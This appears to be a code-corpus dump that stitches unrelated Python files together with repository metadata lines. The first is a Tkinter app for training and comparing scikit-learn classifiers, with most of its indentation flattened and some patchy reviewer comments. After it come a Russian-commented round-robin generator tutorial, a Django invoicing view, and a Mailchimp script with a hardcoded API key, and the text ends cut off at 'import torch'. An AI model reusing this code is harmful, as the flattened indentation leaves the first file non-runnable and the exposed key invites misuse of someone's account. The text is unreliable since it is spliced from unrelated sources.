min_samples_split_liste = [2,3]
min_samples_leaf_liste = [1,2,3]
param_dict = {'n_estimators': n_estimators_liste, 'max_depth': max_depth_liste, 'min_samples_split': min_samples_split_liste, 'min_samples_leaf':min_samples_leaf_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = RandomForestClassifier()
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"configuration of parameters is successfully completed\n" )
def Entrainer_listes(self):
if(self.algorithme_att=='svm'):
self.grid_model.fit(self.X,self.y)
if(self.kernel=='rbf'):
p1 = self.grid_model.best_params_['gamma']
p2 = self.grid_model.best_params_['C']
model = svm.SVC(kernel=self.kernel, gamma=p1, C=p2)
if(self.kernel=='poly'):
p1 = self.grid_model.best_params_['degree']
p2 = self.grid_model.best_params_['C']
p3 = self.grid_model.best_params_['coef0']
model = svm.SVC(kernel=self.kernel, degree=p1, C=p2, coef0=p3, gamma='scale')
if(self.kernel=='sigmoid'):
p1 = self.grid_model.best_params_['gamma']
p2 = self.grid_model.best_params_['C']
p3 = self.grid_model.best_params_['coef0']
model = svm.SVC(kernel=self.kernel, gamma=p1, C=p2, coef0=p3)
if(self.algorithme_att=='DecisionTree'):
self.grid_model.fit(self.X,self.y)
p1 = self.grid_model.best_params_['max_depth']
p2 = self.grid_model.best_params_['min_samples_leaf']
p3 = self.grid_model.best_params_['min_samples_split']
model = DecisionTreeClassifier(max_depth = p1, min_samples_leaf = p2, min_samples_split = p3)
if(self.algorithme_att=='KNeighbors'):
self.grid_model.fit(self.X,self.y)
p1 = self.grid_model.best_params_['n_neighbors']
p2 = self.grid_model.best_params_['p']
p3 = self.grid_model.best_params_['weights']
model = KNeighborsClassifier(n_neighbors = p1, p = p2, weights = p3)
if(self.algorithme_att=='RandomForest'):
self.grid_model.fit(self.X,self.y)
p1 = self.grid_model.best_params_['n_estimators']
p2 = self.grid_model.best_params_['max_depth']
p3 = self.grid_model.best_params_['min_samples_split']
p4 = self.grid_model.best_params_['min_samples_leaf']
model = RandomForestClassifier(n_estimators = p1, max_depth = p2, min_samples_split = p3, min_samples_leaf = p4)
if(self.algorithme_att=='Bayes'):
model = GaussianNB()
l = []
sc_train_liste = []
sc_test_liste = []
for pc in self.pc_liste_att:
X_train, X_test, y_train, y_test = train_test_split(self.X, self.y, test_size=pc, random_state=0)
#np.ravel(y_train,order='C')
model.fit(X_train,y_train)
sc_train = model.score(X_train,y_train)
sc_test = model.score(X_test,y_test)
sc_train_liste.append(sc_train)
sc_test_liste.append(sc_test)
l.append(str(int(pc*100))+" %")
l1 = np.round(sc_train_liste,2)
l2 = np.round(sc_test_liste,2)
df_att = pd.DataFrame({'train':l1, 'test':l2,}, index = l)
std = round(df_att['test'].std(),2)
sc_moy = round(df_att['test'].mean(),2)
self.sc_moyenne_liste.append(sc_moy)
self.std_liste.append(std)
self.model_liste.append(model)
self.df_Result_liste.append(df_att)
canvaResult = Canvas(fenetre, width=560, height=420, background="white",
borderwidth=2, relief=GROOVE)
resul = st.ScrolledText(canvaResult, width=200, height=70, background="white" ,font=("arial ",11))
resul.insert('1.0', "\t\t\t\t Result :\n")
resul.insert(END, "\t\t ******************************************************\n\n")
resul.insert(END,model)
resul.insert(END, "\n\n")
resul.insert(END,df_att)
resul.focus()
resul.configure(state ='disabled')
resul.place(x=0, y=0)
canvaResult.place(x=257, y=0)
#print(model,"\n")
#print(df_att)
#print("\n La moyenne des scores de test :",sc_moy)
#print("La variance entre les données :",std)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the Model is being training")
score.delete('4.0','100.0')
score.insert(END, "\n")
score.insert(END,"AVG test : ")
score.insert(END,sc_moy)
score.insert(END, "\n")
score.insert(END,"STD test :")
score.insert(END,std)
def Comparer_Visualiser(self):
try:
canvaResult = Canvas(fenetre, width=560, height=420, background=canva_color2,
borderwidth=2, relief=GROOVE)
resul = st.ScrolledText(canvaResult, background="white" ,font=("arial ",11))
resul.insert('1.0', "\t\t\t\t Result :\n")
resul.insert(END, "\t\t ******************************************************\n\n")
for i in range(len(self.model_liste)):
#print("Le model",i+1,":")*
j=i+1
resul.insert(END, " Model : ")
resul.insert(END, j )
resul.insert(END, "\n")
#print("********************************************************************************************************** ")
resul.insert(END, " ************************************************************************")
resul.insert(END, "\n")
#print(self.model_liste[i],"\n")
resul.insert(END,self.model_liste[i])
resul.insert(END, "\n")
#print(self.df_Result_liste[i])
resul.insert(END,self.df_Result_liste[i])
resul.insert(END, "\n")
#print("\nLa moyenne des scores de test :",self.sc_moyenne_liste[i])
resul.insert(END,"tests AVG : ")
resul.insert(END, "\n")
resul.insert(END,self.sc_moyenne_liste[i])
resul.insert(END, "\n")
#print("La variance entre les données :",self.std_liste[i],"\n")
resul.insert(END,"tests STD : ")
resul.insert(END, "\n")
resul.insert(END,self.std_liste[i])
resul.insert(END, "\n")
resul.focus()
resul.configure(state ='disabled')
resul.place(x=0, y=0)
canvaResult.place(x=257, y=0)
x = [i for i in range(1,len(self.std_liste)+1)]
y1 = self.sc_moyenne_liste
y2 = self.std_liste
fig=plt.figure(1,figsize=(15,5))
fig=plt.subplot(1,2,1)
fig=plt.title("Avg Sccor")
fig=plt.ylabel(" AVG Accurcy ")
fig=plt.plot(x,y1, 'ro-', label="Model")
fig=plt.legend()
fig=plt.show()
fig=plt.subplot(1,2,2)
fig=plt.title("Std Sccor")
fig=plt.ylabel("STD Accurcy")
fig=plt.plot(x,y2, 'o-', label="Model")
fig=plt.legend()
fig=plt.show()
canvas = FigureCanvasTkAgg(fig, master=fenetre)
canvas.get_tk_widget().pack()
canvas.draw()
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error compare the model is failed!")
# Le model *****************************************************************************************************************************
def Choix_Parametre(self):
try:
name=str(Modelchoi.get())
self.algorithme= name
if(self.algorithme=='svm'):
#kernel, degree_liste, gamma_liste, coef0_liste, C_liste = parametre_svm()
C = 1
kernel = 'rbf'
degree = 3
coef0 = 0
gamma = 'scale'
self.model = svm.SVC(kernel=kernel, degree=degree, gamma=gamma, coef0=coef0, C=C)
if(self.algorithme=='DecisionTree'):
#max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_DecisionTree()
max_depth = None
min_samples_leaf = 1
min_samples_split = 2
self.model = DecisionTreeClassifier(max_depth=max_depth, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)
if(self.algorithme=='KNeighbors'):
#n_neighbors_liste, p_liste, weights_liste = parametre_KNeighbors()
n_neighbors = 5
p = 2
weights = 'uniform'
self.model = KNeighborsClassifier(n_neighbors=n_neighbors, p=p, weights=weights)
if(self.algorithme=='Bayes'):
self.model = GaussianNB()
if(self.algorithme=='RandomForest'):
#n_estimators, max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_RandomForest()
n_estimators = 100
max_depth = None
min_samples_split = 2
min_samples_leaf = 1
self.model = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth, min_samples_split=min_samples_split, min_samples_leaf=min_samples_leaf)
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END," The chosen model is : ")
parachoisir.insert(END, "\n")
parachoisir.insert(END,name)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the train model is successfully configured \n" )
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error in the train model phase !! \n" )
        def Entrainer(self):
            """Fit the currently configured model on the selected X/y."""
            self.model.fit(self.X,self.y)
        def Tester(self):
            """Train the configured model, then score it on the full
            training data and report the accuracy in the GUI widgets."""
            self.Entrainer()
            # Resubstitution score: accuracy on the training data itself.
            sc = self.model.score(self.X,self.y)
            sc = round(sc,2)
            console.delete('3.0','100.0')
            console.insert(END, "\n")
            console.insert(END," The training is over \n")
            console.insert(END, "\n")
            console.insert(END," The test on all of the data: \n")
            score.delete('4.0','100.0')
            score.insert(END, "\n")
            score.insert(END," Accurcy ")
            score.insert(END, "\n")
            # NOTE(review): sc is a 0-1 fraction but is displayed with a
            # " %" suffix — confirm whether sc*100 was intended.
            score.insert(END,sc)
            score.insert(END, " %")
# Appliquer ****************************************************************************************************************************
def Appliquer(self):
console.delete('3.0','100.0')
console.insert(END,"\n")
console.insert(END," model application")
console.insert(END,"\n")
self.X_test_finale = self.df_test[self.cols_X].copy()
y_predict = self.model.predict(self.X_test_finale)
y_predict = pd.DataFrame(y_predict,columns=['y'])
self.df_test_y = pd.concat([self.df_test,y_predict],axis=1)
self.Afficher_Table(self.df_test_y)
console.insert(END," the model is successfully applied")
def Remplire(self):
df = pd.concat([self.target,self.y],axis=1)
m = []
m = [round(df[df['y']==k][self.col_y].mean(),2) for k in range(self.n_clusters)]
self.df_m = pd.DataFrame(m,columns=['mean'])
for i in range(self.df_test.shape[0]):
y = self.df_test_y['y'].iloc[i]
self.df_test_y.loc[i,self.col_y] = self.df_m.loc[y,'mean']
self.Afficher_Table(self.df_test_y)
console.delete('3.0','100.0')
console.insert(END,"\n")
console.insert(END," the target is well Fill")
def Sauvgarder(self):
df_y = self.df_test_y.copy()
df_y.index = self.df_finale[self.df_finale.isnull()[self.col_y]].index
for i in df_y.index:
self.df_finale.loc[i,self.col_y] = df_y.loc[i,self.col_y]
self.Afficher_Table(self.df_finale)
self.df_finale.to_csv('out.csv', index=False)
console.delete('3.0','100.0')
console.insert(END,"\n")
console.insert(END," the target is well Fill")
Model = Model()
#liste =(df.columns.values).tolist()
canva_color2 = "#FCFCFC"
global colname
global rowname
global L_combobox
# ****************************************************************************************************************************
def about_us():
mess1="\t \t \t DATA QUALITY \n "
mess="about us : \n \n DataQuality App for Educatif porpuse "
#messagebox.showinfo(title="Aout Us", message=mess)
fenetrea = Tk()
fenetrea.resizable(width=False, height=False)
fenetrea.title("About Us")
fenetrea.geometry("800x500")
canvas2a = Canvas(fenetrea, width=750, height=450, background="white", borderwidth=2, relief=GROOVE)
canvas2a.place(x=20,y=20)
text=Text(canvas2a,width=68,height=21,font=("Arial",14),background="gray95",foreground="black")
#text = st.ScrolledText(canvas2)
text.place(x=20,y=2000)
text.pack()
text.config(state="normal")
text.insert(END, mess1)
text.insert(END, mess)
fenetrea.mainloop()
#df=pd.read_excel("employe.xlsx")
# fentre tow ---------------------------------------------------------------------------------
fenetre = Tk()
#class begiin
#-----------------------------------
bouton_color = "#DEDEDE"
fenetre.title("DATA QUALITY")
fenetre.geometry("1080x650")
# fenetre.iconbitmap("Logo.ico")
fenetre.resizable(width=False, height=False)
# Menu
menu_G = Menu(fenetre)
fenetre.config(menu=menu_G)
menu1 = Menu(menu_G, tearoff=0)
menub = Menu(menu_G, tearoff=0)
menu_G.add_cascade(label="File", menu=menu1)
menu1.add_command(label="Import", command=lambda:Model.Importer())
menu1.add_separator()
menu1.add_command(label="Exit", command=fenetre.destroy)
menu_G.add_cascade(label="About us ", menu=menub)
menub.add_command(label="G.info", command=about_us)
#-------------------------------------------------------------------------------------------------
def userText(event):
    """Clear the placeholder text of entry `entree_1` when it is clicked.

    Fix: removed the dead local assignment ``usercheck=True`` — it was
    never read (and, as a local, could not act as a flag anyway).
    """
    entree_1.delete(0,END)
def userTextb(event):
    """Clear the placeholder text of entry `entree_2` when it is clicked.

    Fix: removed the dead local assignment ``usercheck=True`` — it was
    never read (and, as a local, could not act as a flag anyway).
    """
    entree_2.delete(0,END)
liste_of_selected_item=[]
def selceted(event):
    """Toggle the current `Input` combobox value in the list of selected
    input features.

    Selecting an item adds it and echoes the selection in `parachoisir`;
    selecting it again removes it and logs the removal in `console`.
    (The misspelled name is kept: it is referenced by the combobox binding.)
    """
    global liste_of_selected_item
    sele =Input.get()
    if(sele in liste_of_selected_item):
        liste_of_selected_item.remove(sele)
        console.delete('3.0','100.0')
        console.insert(END, "\n")
        # Typo fix in the user-visible message: "delted" -> "deleted".
        console.insert(END," deleted :\n")
    else:
        liste_of_selected_item.append(sele)
        parachoisir.delete('3.0','100.0')
        parachoisir.insert(END, "\n")
        parachoisir.insert(END,liste_of_selected_item)
liste_percentage=[]
def pourcentage_selceted(event):
    """Toggle the chosen test-set percentage in `liste_percentage`.

    Selecting a value adds it and echoes the selection in `parachoisir`;
    selecting it again removes it and logs the removal in `console`.
    """
    global liste_percentage
    sele =float(testpercentage.get())
    if(sele in liste_percentage):
        liste_percentage.remove(sele)
        console.delete('3.0','100.0')
        console.insert(END, "\n")
        # Typo fix in the user-visible message: "delted" -> "deleted".
        console.insert(END," deleted :\n")
    else:
        liste_percentage.append(sele)
        parachoisir.delete('3.0','100.0')
        parachoisir.insert(END, "\n")
        parachoisir.insert(END,liste_percentage)
def checkcmbo():
    # Copy the currently selected combobox value into the `fildir` entry.
    # NOTE(review): `fildir` is not defined anywhere in this part of the
    # file — if it does not exist elsewhere, calling this raises NameError;
    # confirm before wiring this callback to a widget.
    value = str( L_combobox.get())
    fildir.insert(0 ,value)
def config():
    # Placeholder callback; intentionally does nothing yet.
    pass
def test():
    # Placeholder callback; intentionally does nothing yet.
    pass
def fonc(event):
    # No-op handler used as a default <<ComboboxSelected>> binding.
    pass
bouton_text_size1 = 10
# Variable encoding ----------------------------------------------------------------------------------------
frame1 = Frame(fenetre, width=250, height=251, borderwidth=2, relief=GROOVE, background="gray35" )
# Label
label2 = Label(frame1, text="Variable Encoding", font=("Arial Black",15), background="gray35",foreground="White Smoke")
label2.place(x=16, y=3)
label2 = Label(frame1, text="Discreet Variable:", font=("Arial Black",13), background="gray35",foreground="White Smoke")
label2.place(x=5, y=35)
DVEname = StringVar()
label2 = Label(frame1, text="Variable :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10,y=70)
DVEncode = ttk.Combobox(frame1, textvariable=DVEname, width=20,state='readonly')
DVEncode.place(x=95, y=70)
DVEncode.bind("<<ComboboxSelected>>", fonc )
DVEncode["value"] =liste
DVEncode.current(0)
encodtype = StringVar()
label2 = Label(frame1, text="Encoding :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10, y=100)
colname = StringVar()
EncoderT = ttk.Combobox(frame1, textvariable=encodtype, width=20,state='readonly')
EncoderT.place(x=95, y=100)
a=["OneLabelEncoder","OneHotEncoder"]
EncoderT["value"] =a
EncoderT.current(0)
EncoderT.bind("<<ComboboxSelected>>")
Encodone=Button(frame1, text="Encode", font=("arial ",10), width=8, height=1, background="gray30", fg='White'
,command=lambda:Model.Codding())
Encodone.place(x=80, y=130)
label2 = Label(frame1, text="Date Varaiable:", font=("Arial Black",13), background="gray35",foreground="White Smoke")
label2.place(x=5, y=157)
label2 = Label(frame1, text="Varaiable :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10,y=188)
dateva= StringVar()
DateVar = ttk.Combobox(frame1, textvariable=dateva, width=20,state='readonly')
DateVar.place(x=95, y=188)
DateVar.bind("<<ComboboxSelected>>", fonc )
DateVar["value"] =liste
DateVar.current(2)
Encodtwo=Button(frame1, text="Encode", font=("arial ",10), width=8, height=1, background="gray30", fg='White'
, command=lambda: Model.Transforme_DATE_Train())
Encodtwo.place(x=80, y=216)
frame1.place(x=0, y=0)
# End encodage data ----------------------------------------------------------------------------------------
# Visualizer data ----------------------------------------------------------------------------------------
#liste =(df.columns.values).tolist()
bouton_text_size3 = 10
frame2 = Frame(fenetre, width=250, height=87, borderwidth=2, relief=GROOVE, background="gray35")
label3 = Label(frame2, text="Correlation Table ",font=("Arial Black",14), background="gray35",foreground="White Smoke")
label3.place(x=16, y=0)
inputvall = StringVar()
label2 = Label(frame2, text="Target :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10,y=30)
corrterget = ttk.Combobox(frame2, textvariable=inputvall, width=20,state='readonly')
corrterget.place(x=95, y=30)
corrterget.bind("<<ComboboxSelected>>", fonc )
corrterget["value"] =liste
corrterget.current(2)
bouton3=Button(frame2, text="View", font=("arial ",10), width=8, height=1, background="gray30", fg='White'
, command=lambda: Model.Correlation_Variable())
bouton3.place(x=80, y=54)
frame2.place(x=0,y=252)
# END Visualizer data -----------------------------------------------------------------------------
# choose input and output ----------------------------------------------------------------------
frame3 = Frame(fenetre, width=250, height=146, borderwidth=2, relief=GROOVE, background="gray35" )
label2 = Label(frame3, text="Variable module", font=("Arial Black",15), background="gray35",foreground="White Smoke")
label2.place(x=25, y=3)
label2 = Label(frame3, text="Input :", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=10, y=40)
"""
inputval = StringVar()
Input = ttk.Combobox(frame3, textvariable=inputval, width=20,state='readonly')
Input.place(x=95, y=45)
Input.bind("<<ComboboxSelected>>", selceted )
Input["value"] =liste
Input.current(0)
"""
bouton3=Button(frame3, text="choose", font=("arial Black ",9), width=15, height=1, background="White", fg='gray30'
, command=lambda: second_window( Model.df_cod))
bouton3.place(x=110, y=45)
label2 = Label(frame3, text="Output :", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=10, y=75)
outputval = StringVar()
Output = ttk.Combobox(frame3, textvariable=outputval, width=20,state='readonly')
Output.place(x=95, y=80)
Output.bind("<<ComboboxSelected>>", fonc )
Output["value"] =liste
Output.current(0)
bouton3=Button(frame3, text="Submit", font=("arial ",12), width=10, height=1, background="gray30", fg='White'
, command=lambda: Model.Selection_fetcher())
bouton3.place(x=80, y=110)
frame3.place(x=0, y=340)
frame3a = Frame(fenetre, width=250, height=117, borderwidth=2, relief=GROOVE, background="gray35" )
label2 = Label(frame3a, text="Discretize the target:", font=("Arial Black",14), background="gray35",foreground="White Smoke")
label2.place(x=16, y=0)
label2 = Label(frame3a, text="Number of class:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=10, y=27)
classnomber = StringVar()
entree_2 = Entry(frame3a, textvariable=classnomber, width=24,background="white",foreground="black",
font=("Arial Rounded MT Bold ",9))
entree_2.place(x=34, y=57)
entree_2.insert(0,"5")
entree_2.bind("<Button>",userTextb)
bouton3=Button(frame3a, text="Discretize", font=("arial ",12), width=10, height=1, background="gray30", fg='White'
, command=lambda:Model.Déscritiser() )
bouton3.place(x=80, y=80)
frame3a.place(x=0, y=487)
# END choose input and output ----------------------------------------------------------------------
bouton_text_size2 = 10
# Test Model ----------------------------------------------------------------------
bouton_text_size2 = 10
frame2 = Frame(fenetre, width=250, height=210, borderwidth=2, relief=GROOVE, background="gray35")
# Label
label2 = Label(frame2, text="Test the Modules:", font=("Arial Black",14), background="gray35",foreground="White Smoke")
label2.place(x=25, y=3)
label2 = Label(frame2, text="Modules:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=35)
modeltype = StringVar()
ModelT = ttk.Combobox(frame2, textvariable=modeltype, width=25,state='readonly')
ModelT.place(x=34, y=65)
a=["svm","DecisionTree","KNeighbors","Bayes","RandomForest"]
ModelT["value"] =a
ModelT.current(0)
ModelT.bind("<<ComboboxSelected>>", fonc )
label2 = Label(frame2, text="test percentage:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=85)
testpercen = StringVar()
testpercentage = ttk.Combobox(frame2, textvariable=testpercen, width=25,state='readonly')
testpercentage.place(x=34, y=115)
a=["5","10","15","20","25"]
testpercentage["value"] =a
testpercentage.current(0)
testpercentage.bind("<<ComboboxSelected>>", pourcentage_selceted )
label2 = Label(frame2, text="module parameter:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=135)
bouton3=Button(frame2, text="config", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Choix_Parametre_listes())
bouton3.place(x=20, y=165)
bouton3=Button(frame2, text="Trainer", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Entrainer_listes())
bouton3.place(x=120, y=165)
frame2.place(x=830,y=0)
# END Test Model ----------------------------------------------------------------------
#Compare MODELE ----------------------------------------------------------------------------------------
frame3B = Frame(fenetre, width=250, height=80, borderwidth=2, relief=GROOVE,background="gray35")
label3 = Label(frame3B, text="Compare Modules ",font=("Arial Black",13), background="gray35",foreground="White Smoke")
label3.place(x=40, y=0)
bouton3=Button(frame3B, text="Compare", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Comparer_Visualiser())
bouton3.place(x=80, y=35)
frame3B.place(x=830,y=211)
#end compare model ----------------------------------------------------------------------------------------
# choose Model ----------------------------------------------------------------------
bouton_text_size2 = 10
frame2 = Frame(fenetre, width=250, height=174, borderwidth=2, relief=GROOVE, background="gray35")
# Label
label2 = Label(frame2, text="choose a Module :", font=("Arial Black",14), background="gray35",foreground="White Smoke")
label2.place(x=25, y=3)
label2 = Label(frame2, text="Modules:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=35)
madelchoix = StringVar()
Modelchoi = ttk.Combobox(frame2, textvariable=madelchoix, width=25,state='readonly')
Modelchoi.place(x=34, y=65)
a=["svm","DecisionTree","KNeighbors","Bayes","RandomForest"]
Modelchoi["value"] =a
Modelchoi.current(0)
Modelchoi.bind("<<ComboboxSelected>>", fonc )
label2 = Label(frame2, text="module parameter:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=90)
bouton3=Button(frame2, text="config", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Choix_Parametre())
bouton3.place(x=20, y=125)
bouton3=Button(frame2, text="Trainer", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Tester())
bouton3.place(x=120, y=125)
frame2.place(x=830,y=292)
# # END chossen Model ----------------------------------------------------------------------
#CHOOSE FEATURE TO APPLIQUE MODELE ----------------------------------------------------------------------------------------
frame3B = Frame(fenetre, width=250, height=134, borderwidth=2, relief=GROOVE,background="gray35")
label3 = Label(frame3B, text="Fill Target ",font=("Arial Black",15), background="gray35",foreground="White Smoke")
label3.place(x=60, y=0)
bouton3=Button(frame3B, text="Apply", font=("arial ",13), width=12, height=1, background="gray30",
fg='White', command=lambda: Model.Appliquer())
bouton3.place(x=60, y=40)
bouton3=Button(frame3B, text="Replenish", font=("arial ",13), width=12, height=1, background="gray30",
fg='White', command=lambda:Model.Remplire())
bouton3.place(x=60, y=80)
frame3B.place(x=830,y=468)
#CHOOSE FEATURE TO APPLIQUE MODELE ----------------------------------------------------------------------------------------
frame4 = Frame(fenetre, width=1100, height=50, borderwidth=2, relief=GROOVE,background="gray35")
bouton4=Button(frame4, text="Initial table",font=("arial ",13), width=10, height=1, background="gray30", fg='White',
command=lambda:Model.Afficher_Table(Model.df_init))
bouton4.place(x=80, y=5)
bouton4=Button(frame4, text="Empty Table ",font=("arial ",13), width=10, height=1, background="gray30", fg='White',
command=lambda:Model.Afficher_Table(Model.df_test))
bouton4.place(x=830, y=5)
bouton4=Button(frame4, text="Save",font=("arial ",13), width=10, height=1, background="gray30", fg='White',
command=lambda:Model.Sauvgarder() )
bouton4.place(x=953, y=5)
label1 = Label(frame4,
text="Created , Developed and Designed by : Anass Houdou , Ouali Soufiyane , Jai Otman \n Directed By: Prof .El far Mohamed BDSAS 2019/2020",
font=("Arial ",9), background="gray35",foreground="White Smoke")
label1.place(x=300, y=5)
frame4.place(x=0, y=605)
#----------------------------------------------------------------------------------------
# Canva zone de tableua
canva_color1 = "#FCFCFC"
canvas1 = Canvas(fenetre, width=560, height=420, background=canva_color1, borderwidth=2, relief=GROOVE)
canvas1.place(x=257, y=0)
# Canva zone sortie
#para ,console ---------------------------------------------------------
canvas3 = Canvas(fenetre, width=360, height=160, background="gray80", borderwidth=2, relief=GROOVE)
parachoisir = st.ScrolledText(canvas3, width=50, height=5, background=canva_color2 ,font=("arial ",10))
parachoisir.insert('1.0', "chosen parameter:\n")
parachoisir.insert(END, "***********************\n\n")
parachoisir.place(x=2, y=0)
console = st.ScrolledText(canvas3, width=50, height=5, background=canva_color2 ,font=("arial ",10))
console.insert('1.0', "console :\n")
console.insert(END, "************\n\n")
console.place(x=2, y=86)
canvas3.place(x=257,y=434)
#END :para ,console ---------------------------------------------------------
#SCORE ---------------------------------------------------------
canvas2 = Canvas(fenetre, width=186, height=161, background=canva_color2, borderwidth=2, relief=GROOVE)
score = st.ScrolledText(canvas2, width=21, height=9, background=canva_color2 ,font=("arial ",11))
score.insert('1.0', "\t score :\n")
score.insert(END, " ***************\n\n")
score.place(x=2, y=2)
canvas2.place(x=628,y=433)
#end SCORE ---------------------------------------------------------
fenetre.mainloop()
| SoufiyaneOuali/Data_Quality_App | appcomple.py | appcomple.py | py | 55,203 | python | en | code | 1 | github-code | 13 |
21207314620 | # https://www.youtube.com/watch?v=zU0TxGyMUs4&list=PLlWXhlUMyooawilqK4lPXRvxtbYiw34S8&index=8
"""
# ===== Генераторы и Событийный цикл Карусель (Round Robin) Часть 2 ===================================================
Суть карусели - престановка первого элемента в конец очереди.
1. Создаем 2 генератора (или более) и помещаем их в очередь
2. Берем первый из очереди. Делаем его итерацию. Помещаем его в конец очереди.
Асинхронный код состоит из 2 условий:
1. Любая конструкция языка, позволяющая передавать выполнение потока: замыкания, генераторы, корутины...
2. Событийный цикл, который решает какой код будет выполняться в тот или иной момент.
"""
from time import sleep
def counter():
    """Generator that counts how many times it has been resumed.

    Each resumption prints the current count, then yields control back
    to the caller (the round-robin event loop).
    """
    tick = 0
    while True:
        print(tick)          # one line of output per resumption
        tick = tick + 1
        yield                # hand control back to the event loop
def printer():
    """Generator that prints 'Bang!' on every third resumption.

    The very first resumption prints (count 0), then every third one
    after that; the other resumptions just yield control back.
    """
    calls = 0
    while True:
        if not calls % 3:
            print('Bang!')
        calls += 1
        yield                # hand control back to the event loop
def main():
    """Round-robin ("carousel") event loop.

    Repeatedly pops the first generator from the module-level `queue`,
    resumes it for one step, and re-enqueues it at the back, so every
    generator gets an equal share of execution. Runs forever.
    """
    while True:
        g = queue.pop(0)  # take the first generator from the queue
        next(g)  # resume it for one step
        queue.append(g)  # put it back at the end of the queue
        sleep(0.5)  # throttle, then move on to the next generator
if __name__ == '__main__':
    # Build the round-robin queue
    queue = []
    # create the two generators and enqueue them
    g1 = counter()
    queue.append(g1)
    g2 = printer()
    queue.append(g2)
    # start the infinite event loop
    main()
| VadimVolynkin/learning_python3 | multi_async/x_3_async_gen_simple.py | x_3_async_gen_simple.py | py | 2,667 | python | ru | code | 0 | github-code | 13 |
10291493681 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from ....productos.inventario.forms import *
from ....request_session import *
# Create your views here.
from django.views.generic import TemplateView
class menu(TemplateView):
    """Renders the billing "modify" menu for an authorized user.

    The final template path is the base directory below concatenated with
    the user-specific template name returned by ``obtenerPlantilla()``.
    """
    # Bug fix: this attribute was misspelled `template_view`, so Django's
    # TemplateView left `self.template_name` as None and the string
    # concatenation in get() raised TypeError on every request.
    template_name="facturacion/modificar/menu/"
    def get(self,request,*args,**kwargs):
        # Only authorized users may see the page.
        if OKpeople(request):
            pl = self.template_name+obtenerPlantilla(request)
            usu = getPerfil(request)
            context={
                "tienda":usu.tienda
            }
            return render(request,pl,context)
        # Anyone else is sent back to the home page.
        return redirect("/")
class modificar(TemplateView):
    """Invoice view: prepares (and creates on first access) the per-store
    sales-document record for invoice page `id` (1..4), then renders the
    invoice form.
    """
    template_name="facturacion/facturas/"
    formU = FormPersona
    url = "/clientes/nit"
    initial={'key':'value'}
    formulario=Form_registrar
    def get(self,request,id=None,*args,**kwargs):
        # `id` selects one of four invoice pages.
        indice=int(id)
        if indice<5 and indice>0:
            if OKpeople(request):
                plantilla=self.template_name+obtenerPlantilla(request)
                usu= getPerfil(request)
                # Link between the logged-in user and their current store.
                ut = USUARIO_TIENDA.objects.filter(usuario=usu).filter(tienda=usu.tienda)
                if ut.exists():
                    ut=ut[0]
                    correlativo=None
                    # Each page keeps its own invoice correlative counter.
                    if indice==1:
                        correlativo=ut.fac_1
                    elif indice==2:
                        correlativo=ut.fac_2
                    elif indice==3:
                        correlativo=ut.fac_3
                    else:
                        correlativo=ut.fac_4
                    # Sales document ("V" — presumably "venta"; confirm) for
                    # this store/page/correlative; create it on first access.
                    dpt=DOCUMENTO_POR_TIENDA.objects.filter(ubicado=ut).filter(pagina=indice).filter(correlativo=correlativo).filter(tipo_doc="V")
                    if not dpt.exists():
                        dpt=DOCUMENTO_POR_TIENDA()
                        dpt.ubicado=ut
                        dpt.pagina=indice
                        dpt.correlativo=correlativo
                        dpt.save()
                    tienda=usu.tienda
                    form=self.formU(initial=self.initial)
                    fm = self.formulario(initial=self.initial)
                    context={
                        "tienda":tienda.nombre,
                        "store":tienda.id,
                        "form":form,
                        "formulario":fm,
                        "url":self.url,
                        "accion":"Facturar",
                        "pagina":indice
                    }
                    return render(request, plantilla, context)
        # Any failed check (page out of range, unauthorized user, missing
        # user/store link) falls through to the home page.
        return redirect("/")
| corporacionrst/software_RST | app/sistema/ventas/modificar/views.py | views.py | py | 1,911 | python | es | code | 0 | github-code | 13 |
31426218429 | import mailchimp_marketing as MailchimpMarketing
from mailchimp_marketing.api_client import ApiClientError
from pprint import pprint
from bs4 import BeautifulSoup
try:
client = MailchimpMarketing.Client()
client.set_config({
"api_key": "b80d7ce5bd37f1f133f5b4202e16e76e-us8",
"server": "us8"
})
response = client.campaigns.list(sort_field="send_time",sort_dir="DESC", count=2)
campaign = response['campaigns'][1]
id = campaign['id']
campaign_html = client.campaigns.get_content(id)['archive_html']
except ApiClientError as error:
print(error)
soup = BeautifulSoup(campaign_html, 'lxml')
headers = soup.find_all('div',attrs = {'style':"text-align"})
pprint(headers)
pprint(len(headers))
| eclubutd/eclub-bot | src/mailchimp.py | mailchimp.py | py | 749 | python | en | code | 0 | github-code | 13 |
13865333347 | import torch
